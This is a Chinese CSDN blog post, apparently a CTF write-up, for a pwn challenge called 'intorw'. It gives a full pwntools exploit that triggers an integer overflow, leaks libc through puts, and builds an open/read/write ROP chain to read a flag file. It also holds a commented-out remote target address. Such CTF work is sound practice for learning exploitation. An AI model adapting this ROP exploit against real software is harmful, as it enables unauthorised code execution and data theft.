PWN:intorw

于 2022-10-19 20:14:36 发布
阅读量131 收藏
点赞数
分类专栏: pwn 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53932372/article/details/127414620
版权

这道题目就是很简单的整数溢出+rop。

exp

这个exp要区分本地的libc和远程的libc,具体我就不修改了,本地打就把后面的一个gadget的代码改一改。

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'

elf = ELF('./intorw')
libc=ELF('./old_libc.so.6')
poprdi = next(elf.search(asm('pop rdi;ret')))

def look(sh):
	gdb.attach(sh,"b *0x0400A40")
	pause()

#sh = remote("43.143.7.97",28284)
sh = process(argv=['./intorw'])#,env={'LD_PRELOAD':'/home/gao/Desktop/intorw/libc.so.6'})

sh.sendlineafter("Please enter how many bits you want to read\n",str(2147483648))


main=0x00400A47
vuln=0x0004009C4

payload=b'a'*(0x20+8)+p64(poprdi)+p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(vuln)
sh.sendlineafter(b"Please enter what you want to read:\n",payload)

libc_base = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
libc.address = libc_base
print("[*]")
print(hex(libc.address))

openn=libc.sym["open"]
write=libc.sym["write"]
read=libc.sym["read"]

print("[*]")
print(hex(openn))

print("[*]")
print(hex(write))

print("[*]")
print(hex(read))

gift=0x000601020

#poprdi = next(elf.search(asm('pop rdi;ret')))
poprdi=next(libc.search(asm("pop rdi;ret")))
poprsi=next(libc.search(asm("pop rsi;ret")))
poprdxr12=next(libc.search(asm("pop rdx;pop r12;ret")))
ret=next(libc.search(asm("ret")))

'''
总的目的就是实现open后的fd传入rdi,作为read的第一个参数。
我这样有一个好处,就是打开文件后直接传参数到rdi,不必去猜对方机器打开的fd是否是3。
'''
#这里是一个gadget,可以实现movrdirax
#偏移要自己找
movrdirax=next(libc.search(asm("mov edi,eax;cmp rdx,rcx")))
#为了上面的gadget不被影响,要使用下面的gadget
poprcxrbx=next(libc.search(asm("pop rcx;pop rbx;ret;")))

payload2=b'a'*(0x20+8)+p64(poprdi)+p64(gift+38)+p64(poprsi)+p64(0)+p64(poprdxr12)+p64(0)+p64(0)+p64(openn)
payload2+=p64(poprcxrbx)+p64(555)+p64(555)+p64(movrdirax)
payload2+=p64(poprsi)+p64(gift)+p64(poprdxr12)+p64(40)+p64(0)+p64(read)
payload2+=p64(poprdi)+p64(1)+p64(poprsi)+p64(gift)+p64(poprdxr12)+p64(40)+p64(0)+p64(write)

sh.sendlineafter("Please enter how many bits you want to read\n",str(2147483648))
#look(sh)
sh.sendafter("Please enter what you want to read:\n",payload2)
sh.interactive()
we have a whole life
关注
专栏目录
pwn:Pwn技术的集合
05-13
wn Pwn技术的集合
PWN:[Week1]safe_shellcode
m0_53932372的博客
10-19 523
pwn
PWN:pwntools的安装
m0_53932372的博客
07-01 2345
pwntools sudo apt update sudo apt install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential (安装pip3) pip3 -v (查看版本) pip换源 在根目录下创建文件夹: .pip 在.pip里创建文件: pip.conf 自行安装vim sudo apt vim 使用vim libcsearch pwndbg peda gef ......
PWN:关于对Random函数的研究
m0_53932372的博客
03-01 661
random在CTF中经常出现,所以今天我想深度的研究这个函数。 srand()函数 原型:void srand(unsigned seed); 给rand()函数设置种子。 rand()函数 原型 在执行前,会先查看是否使用了srand()函数。 1.使用了srand(seed),就按照这个东西来产生随机数。 2.没有使用srand(seed),就默认使用了srand(1)来产生随机数。 time函数 原型:time_t time(time_t *timer) timer=NULL时得到当前日历时间(从1
日行一pwnpwn1_sctf_2016
m0_57221101的博客
05-13 555
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
pwn:pwnpi 的 pwn 东西
06-14
pwn pwnpi 的 pwn 东西这东西有一天应该做什么: 检查可能的网络连接 -- LAN -- WLAN -- 3G 如果连接可用,提供 -- 反向隧道 -- 在该网络中嗅探 -- 该网络中的 autometasploit -- nmap 扫描该网络 -- 创建 Evil Twin...
browser_pwn:浏览器pwn,现在主要工作
03-22
browser_pwn 浏览器pwn,现在主要工作。 v8_pwn v8开发 jsc_pwn 对jsc的利用
pwn:JavaScript事件系统的100 SLOC处理
05-15
使用obj.prototype = Object.create(pwn); pwn您的对象没错-甚至不必担心您的构造函数-那是一些伪古典的垃圾。 你把它铺好了。 注册新的事件监听器 // obj.on(event, callback, context)obj . on ( 'change' , func...
nodejs-trabalhofinal_pwn:PWN的最终工作
04-22
最后的工作 课程:Full Stack Web开发 学科:使用Node.js进行Web编程 老师: :page_with_curl: 陈述 待办事项清单 SM Solutions雇用您来开发产品,您可以在其中添加多个列表和每个列表的任务。...
pwntools:类型转换
m0_53932372的博客
09-08 4488
byte和str 首先一定要注意,byte和str在python里面有明确的区分,尤其是在做pwn的题目时,一定要注意这个问题。 参考链接:https://www.cnblogs.com/mlgjb/p/7899534.html hex hex(x) x -- 10进制整数 返回16进制数,以字符串形式表示。 p32、p64 p32(x) x-- 一个整型数据 返回byte型。 u32、u64 u32(x) x-- byte型 返回整型。 int类型转换 int(a,base=x)
攻防世界:PWN刷题-forgot
m0_53932372的博客
12-30 2251
forgot 这题,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本题出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
攻防世界:PWN刷题-反应釜开关控制
m0_53932372的博客
12-30 2005
反应釜开关控制 思路:没有开启pie,并且直接有system("/bin/sh"); 和ret2text方法一样。 exp: #!/usr/bin/python from pwn import * p = remote(“111.200.241.244”,52515) payload=b’a’*512+b’b’*8+p64(0x00004005F6) p.sendline(payload) p.interactive() ...
PWN:栈溢出----偏移的计算
m0_53932372的博客
08-03 1950
就目前遇到的栈溢出题目而言,使用ida就可以完成便宜的计算。 这些栈溢出题目,基本上不需要调试,ida本身提供的栈空间数据就可以实现偏移的计算。 BUUCTF:bjdctf_2020_babystack2 这道题目,我们看ida: 具体做法不细说,主要看偏移: buf和nbyte 看栈空间: 下方没有s只有r,而r就是返回地址 给了后门函数,那就利用read函数,达到缓冲区溢出的目的。 +0x8-(-0x10)=0x18=24 偏移就是二十四。 以上只是本人拙见,栈溢出偏移困扰了我很久,希望这次不会
pwn学习-----<netcat,也即nc>
m0_53932372的博客
03-13 1727
第一次使用netcat,经历了太多的痛苦。 看了许多大佬的文章,才找到如何在Ubuntu上安装nc。 首先我想用yum安装,但死活无法使用yum,并且发现安装yum比较麻烦。 于是我打算直接安装nc。 参考: https://www.jianshu.com/p/91dd4ab317c7 先输入命令: sudo apt-get -y install netcat-traditional 然后输入 sudo update-alternatives --config nc (设置默认的nc,选择/bin/nc.t
攻防世界:PWN刷题-实时数据监测
m0_53932372的博客
12-30 1457
实时数据监测 思路:程序是裸奔的。 漏洞是格式字符串,利用这个漏洞修改key的值,就可以了。 学会的新知识:本来想大数字覆盖一个一个来,但其实pwntools的fmtstr_payload模块就可以了。 fmtstr_payload(offset,{address:value}) exp: #!/usr/bin/python from pwn import * fmt_addr=0x0804A048 p = remote("111.200.241.244",49656) payload=fmtstr_pa
C语言:空格的存在会影响程序的编译?<其实不太确定>
m0_53932372的博客
04-11 489
在编写c程序时,尤其是在复制粘贴时,有些空格的存在会影响程序的编译。 最好删去这些空格。 源程序: 显然,可以看出存在以些这样的空格。 删去后就没问题了。
partial overwrite绕过PIE
m0_53932372的博客
10-16 286
pwn
PWN:Bad Seed
m0_53932372的博客
03-01 269
感觉没什么太特殊的地方,都是把原本的代码拿过来用而已,所以就觉得这些东西,没什么意思。 上面的代码是我从文章中自己摘出来的,然后自己看了看文章的解决方案写出的代码。 第一题: 破解下面的程序: random.c #include <stdio.h> #include <stdlib.h> #include <time.h> int main() { srand((unsigned int)time(NULL)); int targetnum=rand
from pwn import * ImportError: No module named pwn
最新发布
04-16
当出现`ImportError: No module named ***`的错误时,通常是因为Python无法找到所需的模块。这可能是由于以下原因之一导致的: 1. 模块未安装:确保你已经使用pip或其他包管理器正确安装了所需的模块。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值